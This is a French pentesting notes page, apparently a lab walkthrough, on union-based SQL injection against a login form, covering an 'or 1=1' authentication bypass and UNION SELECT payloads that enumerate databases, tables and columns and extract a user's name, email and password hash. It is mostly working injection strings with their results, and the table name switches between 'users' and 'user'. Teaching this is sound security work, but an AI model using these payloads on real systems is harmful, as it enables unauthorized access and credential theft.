SQLI (Union-Based) - Pentesting Web

En utilisant Burp Suite, on peut intercepter la requête nous permettant de tester l'injection SQL.

Injection SQL de Base:

Pour contourner l'authentification avec une injection simple, on utilise :

admin ' or 1=1-- -

Ce type d'injection force la condition à être toujours vraie (1=1), permettant l'accès au panneau admin en contournant les contrôles d'identification.

Injection basée sur l'UNION

Avec une injection Union-Based SQL, on essaie de déterminer le nombre de colonnes pour structurer les requêtes de manière compatible avec la base de données. Exemple :

admin' union select 1,2,3,4-- -

Le serveur retourne une réponse indiquant un "login successful," montrant qu'il y a 4 colonnes.

Lister les Bases de Données

Pour lister le nom de la base de données actuelle, on utilise :

admin' union select 1,2,3,database()-- -&password=admin

Ensuite, pour obtenir toutes les bases de données disponibles :

admin' union select 1,2,3,group_concat(schema_name) from information_schema.schemata-- -&password=admin

Résultat : information_schema, main

Lister les Tables

Après avoir identifié la base main, on liste les tables de cette base pour explorer les structures stockées :

admin' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='main'-- -

Tables trouvées : blog, blog_comments, users.

Lister les Colonnes d'une Table

Pour la table users, on liste les colonnes disponibles :

admin' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema='main' and table_name='user' -- -

Colonnes trouvées : email, id, name, password.

Extraction des Données Utilisateur

On extrait ensuite les données de la table users :

admin' union select 1,2,3,group_concat(name,':',email,':',password) from main.user -- -

USER: Admin

EMAIL: [email protected]

PASSWORD (hash): 2b22337f218b2d82dfc3b6f77e7cb8ec

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?